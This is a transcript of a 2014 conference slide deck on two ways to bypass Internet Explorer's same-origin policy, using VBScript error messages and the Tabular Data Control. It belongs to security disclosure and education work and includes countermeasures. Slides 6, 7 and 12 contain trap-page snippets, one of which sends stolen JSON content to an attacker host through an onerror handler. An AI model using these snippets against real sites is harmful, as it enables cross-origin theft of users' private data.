Bypass SOP, Theft your data #appsecapac2014

Transcript

1. View Slide

2. !  Yosuke  HASEGAWA    @hasegawayosuke    
   !  Engineer  of  NetAgent  Co.,Ltd.  
   !  Secure  Sky  Technology  Inc.  technical  adviser  
   !  http://utf-‐‑‒8.jp/
   author  of  jjencode,  aaencode,  ...  
   !  OWASP  Kansai  Chapter  Leader  
   !  OWASP  Japan  Chapter  Advisory  Board  member  
   

   View Slide

3. !  Cross-‐‑‒Origin  information  disclosure  
   !  Not  XSS,  but  bypass  SOP    
   !  Introduce  2  ways  for  modern  IE  
   !  VBScript  Error  msg    
   !  Tabular  Data  Control  
   

   View Slide

4. View Slide

5. !  VBScript  Error  Msg  
   !  Target:  IE9-‐‑‒10  (IE6-‐‑‒8  is  safe,  wow!)  
   !  Reading  JSON  Array  as  VBScript  on  
   trap  page  created  by  attacker  
   !  VBScript  raises  exception  with  error  
   message  including  JSON  content  
   !  JavaScript  can  access  to  JSON  content  
   via  error  message  
   

   View Slide

6. !  Reading  JSON  as  VBScript  src  
   !  fail  →  raises  exception  
   //  Trap  page  by  attacker  
      src="http://example.jp/target.json"  
      language="vbscript">  
    
   HTTP/1.1  200  OK  
   Content-­‐Type:  application/json;  charset=utf-­‐8  
   [  "secret",  "data",  "is",  "here"  ]  
   

   View Slide

7. !  catch  error  msg  with  error  handler  
   GET  http://attacker.utf-­‐8.jp/log?Type%20mismatch:%20'  
   %20"secret",%20"message",%20"is",%20"here"%20'  HTTP/1.1  
   Referer:  http://attacker.utf-­‐8.jp/  
   User-­‐Agent:  Mozilla/5.0  (compatible;  MSIE  10.0;  Windows  NT  
   6.1;  WOW64;  Trident/6.0)  
    <br/>window.onerror  =  function(  e  ){  <br/>        document.getElementById(  "img"  ).setAttribute(  <br/>                "src",  "http://attacker.utf-­‐8.jp/log?"  +  e  );  <br/>}  <br/>  
   language="vbscript">  
   

   View Slide

8. !  Countermeasure  
   !  add  "X-‐‑‒Content-‐‑‒Type-‐‑‒Options:nosniff"  
   HTTP/1.1  200  OK  
   Content-­‐Type:  application/json;  charset=utf-­‐8  
   X-­‐Content-­‐Type-­‐Options:  nosniff  
   [  "secret",  "data",  "is",  "here"  ]  
   

   View Slide

9. !  supplementary  
   !  Dec  2012:  reported  to  MS  by  me  and  
   @masa141421356  
   !  May  2013:  Fixed  with  MS13-‐‑‒037  only  
   for  IE6-‐‑‒8.  IE9-‐‑‒10  was  not.  
   !  "Add  X-‐‑‒C-‐‑‒T-‐‑‒O  header  for  IE9-‐‑‒11  to  
   prevent  from  this  attack,  this  is  
   BEHAVIOR  BY  DESIGIN"  they  said.  
   

   View Slide

10. View Slide

11. !  Tabular  Data  Control  -‐‑‒  TDC  
    !  ActiveX  Control  for  binding  text  file  into  
    HTML  as  data  table
    http://msdn.microsoft.com/en-­‐us/library/ms531356.aspx  
    !  Enabled  by  default  on  IE6-‐‑‒IE11,  with  
    older  doc-‐‑‒mode
     
    !  Spotlighted  by  Cure53  X-‐‑‒Mas  Challenge
    https://cure53.de/xmas2013/  
    https://cure53.de/xmas2013/writeup  
     The  winner  is  @kinugawamasato  
    

    View Slide

12. //  Trap  page  by  attacker  on  attacker.utf-­‐8.jp  
    function  show(){  
           var  s  =  document.getElementById("tdc")  
                           .recordset.getString();  
           alert(  s  );  
    }  
    ...  
     
       classid="clsid:333C7BC4-­‐460F-­‐11D0-­‐BC04-­‐0080C7055A83">  
     
     
    //target  page  included  secret  data  on  example.jp/target.txt  
    Content-­‐Type:  application/octet-­‐stream  
    Content-­‐Disposition:  attachment;  filename=bindata  
    X-­‐Content-­‐Type-­‐Options:  nosnifｆ  
    @!allow_domains=attacker.utf-­‐8.jp  
    secret,data,is,here  
    

    View Slide

13. !  Attacker  has  to  insert  "@!
    allow_domains=..."  into  the  top  of  
    target  text  
    !  Once  inserted,  no  way  to  prevent  
    from  theft  
    !  Unhelpful:
    X-­‐Content-­‐Type-­‐Options:  nosniff    
    Content-­‐Disposition:  attachment  
    

    View Slide

14. !  Countermeasure  
    !  Restrict  access  to  XHR  request  with  
    custom  X  header  
               and  /  or...  
    var  xhr  =  new  XMLHttpRequest();  
    xhr.open(  "GET",  "http://example.jp/target.txt",  true  );  
    xhr.setRequestHeader("X-­‐Requested-­‐With",  "XMLHttpRequest");  
    xhr.send(  null  );  
    GET  /target.json  HTTP/1.1  
    Host:  example.jp  
    User-­‐Agent:  Mozilla/5.0…  
    Accept:  */*  
    X-­‐Requested-­‐With:  XMLHttpRequest  
    

    View Slide

15. !  Countermeasure  (cont.)  
    !  Don't  allow  to  place  text  by  attacker  
    into  top  of  the  content  
    //target  page  included  secret  data  on  example.jp/target.txt  
    Content-­‐Type:  application/octet-­‐stream  
    Content-­‐Disposition:  attachment;  filename=bindata  
    X-­‐Content-­‐Type-­‐Options:  nosniff  
    @!allow_domains=attacker.utf-­‐8.jp  
    secret,data,is,here  
    

    View Slide

16. View Slide

17. !  Conclusion  
    !  IE  has  funny  behavior  even  now  
    !  Add  X-‐‑‒Content-‐‑‒Type-‐‑‒Options  for  all  
    resources  
    !  Restrict  access  to  XHR  with  custom  
    X-‐‑‒  header  
    

    View Slide

18. !  Question  ?  
     hasegawa@utf-‐‑‒8.jp  
     @hasegawayosuke  
     http://utf-‐‑‒8.jp/  
    

    View Slide